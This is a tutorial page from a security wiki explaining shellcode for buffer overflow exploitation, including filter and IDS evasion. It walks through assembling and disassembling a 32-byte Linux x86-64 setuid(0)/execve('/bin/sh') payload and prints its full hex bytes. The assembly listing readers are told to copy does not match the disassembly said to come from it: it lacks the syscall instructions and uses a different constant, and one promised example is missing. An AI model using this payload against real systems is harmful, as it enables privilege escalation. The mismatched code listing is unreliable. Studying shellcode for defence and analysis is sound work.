Questions about this topic? Sign up to ask in the talk tab.


From NetSec
Jump to: navigation, search

Shellcode, also known as bytecode, is machine code (binary represented in hexadecimal) which can be used for buffer overflow exploitation, and is usually represented to humans in assembly. Machine code can be used by a programmer to write any application from an assembly approach (as it is just as powerful as any other programming language), though unlike other languages it is usually (but not always) limited to a single operating system and instruction set architecture.

All code described in this category is provided in the shellcode appendix.

Shellcode requires a basic understanding of bitwise math, linux assembly, and stack overflows


Every programming language is eventually expressed in binary, either at compile-time or runtime. When writing a buffer overflow there are many potential obstructions from security infrastructures (such as DEP, ASLR, firewalls, or IDS and IPS appliances) to keep in mind, as many filter bypass and IDS evasion techniques may need to be utilized for successful exploitation past modern countermeasures.

This article assumes that the user has access to some form of Linux or Unix bash environment with the standard GNU core utilities installed. In some cases, stub examples can be tested or used using OllyDBG or IDA pro. Throughout the articles in this category are small snippets of code taken from the examples found in the appendix; alternatively, shellcode and associated object files in this article are also contained in shellcodecs.

Types of shellcode

Many different types of shellcode may be utilized depending on the target environment for the execution of the code. Different types of countermeasures at different levels of the OSI model require different techniques for successful exploitation of a given application's vulnerability.

Executable vs. Return-oriented

There are primarily two types of shellcode from a runtime perspective: executable shellcode and return-oriented shellcode. The type required for successful exploitation is dictated by the target environment's ability to execute a data stack. If properly targetted, return oriented shellcode should work regardless of the stack's ability to execute, while executable shellcode will work exclusively on executable stacks.

  • Return oriented shellcode utilizes return oriented programming in cases when the vulnerable buffer is non-executable. This is usually performed by constructing a call stack formatted in a similar fashion to that generated by an ordinary compiled application which then triggers the execution of executable shellcode. Because the call stack is treated as data, this bypasses the need for an executable stack during exploitation.

c3el4.png Certain instruction set architectures, such as MIPS, are not vulnerable to return oriented programming or traditional stack overflows due to the fact that they do not store the return addresses to functions in the stack.

Countermeasures and environmental hostility

While traditional binary shellcodes will normally work unincumbered for unsanitized, unpatched, or larger inputs, many target environments and applications may have a variety of limiting factors that serve as obstacles to the execution of traditional machine code. Most applications written in C or C++ will require that the machine code be null-free, which is why null-free shellcode is the traditional basic form of executable shellcode programming.

  • Character filters can be evaded by utilizing polymorphic (self-modifying code) to reconstruct bytecode outside of the allowed character set during runtime. Most character filters restrict characters to the printable keyspace, and so ascii shellcode and alphanumeric shellcode have become prevalent means of circumventing them.
  • Character encoding can be bypassed by encoding the payload so that it will decode to the proper hexadecimal machine code. It is often that code will have to survive unicode, base64, case conversions, or other decoding before being copied into the vulnerable buffer.
  • Buffer size may be incredibly limited and can require second-order-injection in circumstances which the payload is too large to fit into the vulnerable buffer. As a result, a shellcode's size is traditionally kept to a minimum for optimal re-usability.

Shellcode mechanics

Shellcode is usually written first in assembly language. While it is possible for one to memorize an opcode table and write direct machine code by hand, this is not usually suitable for beginners and therefore is not recommended.

Environmental factors

  • Operating systems handle the C API a bit differently. Normally (but not always) shellcode for Linux relies on kernel interrupts for unlinked calls, while Microsoft Windows does not provide an interrupt API and shellcode must therefore utilize PE parsing to perform its own linking at runtime.

Assembling the code

Create a text file named test_shellcode.s.

This example will use hatter's null-free 32-byte payload for setuid(0); execve('/bin/sh',null,null). Copy the following code into test_shellcode.s, then save it:

# 32 bytes
.globl _start
  xor    %rdi,%rdi
  pushq  $0x69
  pop    %rax
  push   %rdi
  push   %rdi
  pop    %rsi
  pop    %rdx
  pushq  $0x68
  movabs $0x7361622f6e69622f,%rax
  push   %rax
  push   %rsp
  pop    %rdi
  pushq  $0x3b
  pop    %rax

When creating shellcode on a Linux platform, the source file can be assembled using the GNU assembler:


localhost:~ $ as test_shellcode.s -o test_shellcode.o

Extracting the shellcode

Once the shellcode has been assembled, it is possible to turn this into bytecode using the Linux binary object dumper:


localhost:~ $ objdump -d test_shellcode.o

The middle column contains the byte instructions corresponding to the assembly on that line. Most debuggers also show a hexadecimal representation corresponding with the assembly of the debugged application, in this case:

[email protected]:~$ objdump -d test_shellcode.o

test_shellcode.o: file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 

The hexadecimal in the middle column is the bytecode for the executable segment. To make this into "shellcode", place a \x prefix before each byte, like so:


If it is desirable, it can be turned directly into binary using perl's print statement, "echo -en" in bash, or other interpreted language.

Shellcode Disassembly

Many times you may come across shellcode in the wild, for example when analyzing malware or the newest exploit. You may want to disassemble the shellcode to learn what it does, the easiest way to do this is with objdump. In this example we'll use the example code which we just constructed, the shortest 64-bit setuid() shell online:

 ╭─[email protected] ~  
 ╰─➤  echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" > 
 shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
 shellcode:     file format binary
 Disassembly of section .data:
 00000000 <.data>:
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 
 ╭─[email protected] ~  

Shellcode is part of a series on programming.
Shellcode is part of a series on exploitation.